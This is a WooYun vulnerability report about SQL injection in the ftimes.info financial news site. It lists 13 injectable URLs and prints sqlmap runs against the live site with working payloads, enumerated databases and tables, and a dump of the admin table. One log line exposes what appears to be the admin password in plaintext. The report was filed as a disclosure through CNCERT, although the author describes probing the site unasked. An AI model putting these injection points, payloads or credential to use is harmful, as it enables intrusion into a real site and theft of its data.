当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169265

漏洞标题: 中国金融CIO联盟-金融时代网存在多处SQL注入漏洞

相关厂商:金融时代网

漏洞作者: Trail-Say

提交时间:2016-01-18 01:00

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

曾经友情检测过,回复修复了,但仍未修复

详细说明:

曾经友情检测过,回复修复了,但仍未修复,好像比以前更多的样子

http://www.ftimes.info/message/123.php?id=
http://www.ftimes.info/message/messageshow.php?newsid=
http://www.ftimes.info/message1/123.php?id=
http://www.ftimes.info/message1/messageshow.php?newsid=
http://www.ftimes.info/shenghuo_folder/shenghuo.php?bigtype=
http://www.ftimes.info/shoucang_folder/shoucang_sanjinews.php?pageno=
http://www.ftimes.info/shoucang_message/123.php?id=
http://www.ftimes.info/shoucang_message/messageshow.php?newsid=
http://www.ftimes.info/sousuo_search.php?neirong=&pageno=
http://www.ftimes.info/wochi_zhangtu/showtu.php?id=
http://www.ftimes.info/wochi_zhangtu/tiao1.php?id=
http://www.ftimes.info/wochi_zhangtu/tiao2.php?id=
http://www.ftimes.info/xinwen_erji.php?bigtype=

漏洞证明:

E:\Python27\sqlmap>sqlmap.py -u "http://www.ftimes.info/message1/messageshow.php?newsid=1" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:11:36
[00:11:37] [INFO] resuming back-end DBMS 'mysql'
[00:11:37] [INFO] testing connection to the target URL
[00:11:37] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: newsid=1 RLIKE (SELECT (CASE WHEN (6652=6652) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newsid=1 OR SLEEP(5)
---
[00:11:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[00:11:37] [INFO] fetching database names
[00:11:37] [INFO] fetching number of databases
[00:11:37] [INFO] resumed: 5
[00:11:37] [INFO] resumed: information_schema
[00:11:37] [INFO] resumed: cio
[00:11:37] [INFO] resumed: jrsdzh
[00:11:38] [INFO] resumed: wochi
[00:11:38] [INFO] resumed: wochibuu
available databases [5]:
[*] cio
[*] information_schema
[*] jrsdzh
[*] wochi
[*] wochibuu


E:\Python27\sqlmap>sqlmap.py -u "http://www.ftimes.info/message1/messageshow.php?newsid=1" --current-db --current-user
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:13:55
[00:13:55] [INFO] resuming back-end DBMS 'mysql'
[00:13:55] [INFO] testing connection to the target URL
[00:13:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: newsid=1 RLIKE (SELECT (CASE WHEN (6652=6652) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newsid=1 OR SLEEP(5)
---
[00:13:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[00:13:56] [INFO] fetching current user
[00:13:56] [INFO] resumed: jrsd@localhost
current user: 'jrsd@localhost'
[00:13:56] [INFO] fetching current database
[00:13:56] [INFO] resumed: wochi
current database: 'wochi'


E:\Python27\sqlmap>sqlmap.py -u "http://www.ftimes.info/message1/messageshow.php?newsid=1" -D "cio" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:14:33
[00:14:33] [INFO] resuming back-end DBMS 'mysql'
[00:14:33] [INFO] testing connection to the target URL
[00:14:34] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: newsid=1 RLIKE (SELECT (CASE WHEN (6652=6652) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newsid=1 OR SLEEP(5)
---
[00:14:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[00:14:34] [INFO] fetching tables for database: 'cio'
[00:14:34] [INFO] fetching number of tables for database 'cio'
[00:14:34] [INFO] resumed: 171
[00:14:34] [INFO] resumed: cdb_access
[00:14:34] [INFO] resumed: cdb_activities
[00:14:34] [INFO] resumed: cdb_activityapplies
[00:14:34] [INFO] resumed: cdb_adminactions
[00:14:34] [INFO] resumed: cdb_admincustom
[00:14:34] [INFO] resumed: cdb_admingroups
[00:14:34] [INFO] resumed: cdb_adminnotes
[00:14:34] [INFO] resumed: cdb_adminsessions
[00:14:34] [INFO] resumed: cdb_advcaches
[00:14:34] [INFO] resumed: cdb_advertisements
[00:14:34] [INFO] resumed: cdb_announcements
[00:14:34] [INFO] resumed: cdb_attachments
[00:14:34] [INFO] resumed: cdb_attachpaymentlog
[00:14:34] [INFO] resumed: cdb_attachtypes
[00:14:34] [INFO] resumed: cdb_banned
[00:14:34] [INFO] resumed: cdb_bbcodes
[00:14:34] [INFO] resumed: cdb_caches
[00:14:34] [INFO] resumed: cdb_campaigns
[00:14:34] [INFO] resumed: cdb_creditslog
[00:14:34] [INFO] resumed: cdb_crons
[00:14:34] [INFO] resumed: cdb_debateposts
[00:14:34] [INFO] resumed: cdb_debates
[00:14:34] [INFO] resumed: cdb_failedlogins
[00:14:34] [INFO] resumed: cdb_faqs
[00:14:34] [INFO] resumed: cdb_favorites
[00:14:34] [INFO] resumed: cdb_forumfields
[00:14:34] [INFO] resumed: cdb_forumlinks
[00:14:34] [INFO] resumed: cdb_forumrecommend
[00:14:34] [INFO] resumed: cdb_forums
[00:14:34] [INFO] resumed: cdb_imagetypes
[00:14:34] [INFO] resumed: cdb_invites
[00:14:34] [INFO] resumed: cdb_itempool
[00:14:34] [INFO] resumed: cdb_magiclog
[00:14:34] [INFO] resumed: cdb_magicmarket
[00:14:34] [INFO] resumed: cdb_magics
[00:14:34] [INFO] resuming partial value: cdb_me
[00:14:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:14:34] [INFO] retrieved:
[00:14:35] [WARNING] reflective value(s) found and filtering out
d
[00:14:39] [ERROR] user aborted


E:\Python27\sqlmap>sqlmap.py -u "http://www.ftimes.info/message1/messageshow.php?newsid=1" --dump -D "wochi" -T "news_admin" -C "username,password"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:33:01
[00:33:02] [INFO] resuming back-end DBMS 'mysql'
[00:33:02] [INFO] testing connection to the target URL
[00:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: newsid=1 RLIKE (SELECT (CASE WHEN (6652=6652) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newsid=1 OR SLEEP(5)
---
[00:33:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[00:33:02] [INFO] fetching entries of column(s) 'password, username' for table 'news_admin' in database 'wochi'
[00:33:02] [INFO] fetching number of column(s) 'password, username' entries for table 'news_admin' in database 'wochi'
[00:33:02] [INFO] resumed: 1
[00:33:02] [INFO] resumed: jrsd123456$.pp
[00:33:02] [INFO] resumed: wochi
[00:33:02] [INFO] analyzing table dump for possible password hashes
Database: wochi
Table: news_admin
[1 entry]
+----------+----------------+
| username | password |
+----------+----------------+
| wochi | ************** |
+----------+----------------+


证明有漏洞,就点到为止。

修复方案:

参数过滤!而不是简单对登录做限制,禁止注册而已!
ps:有礼物没?

版权声明:转载请注明来源 Trail-Say@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-01-20 15:53

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无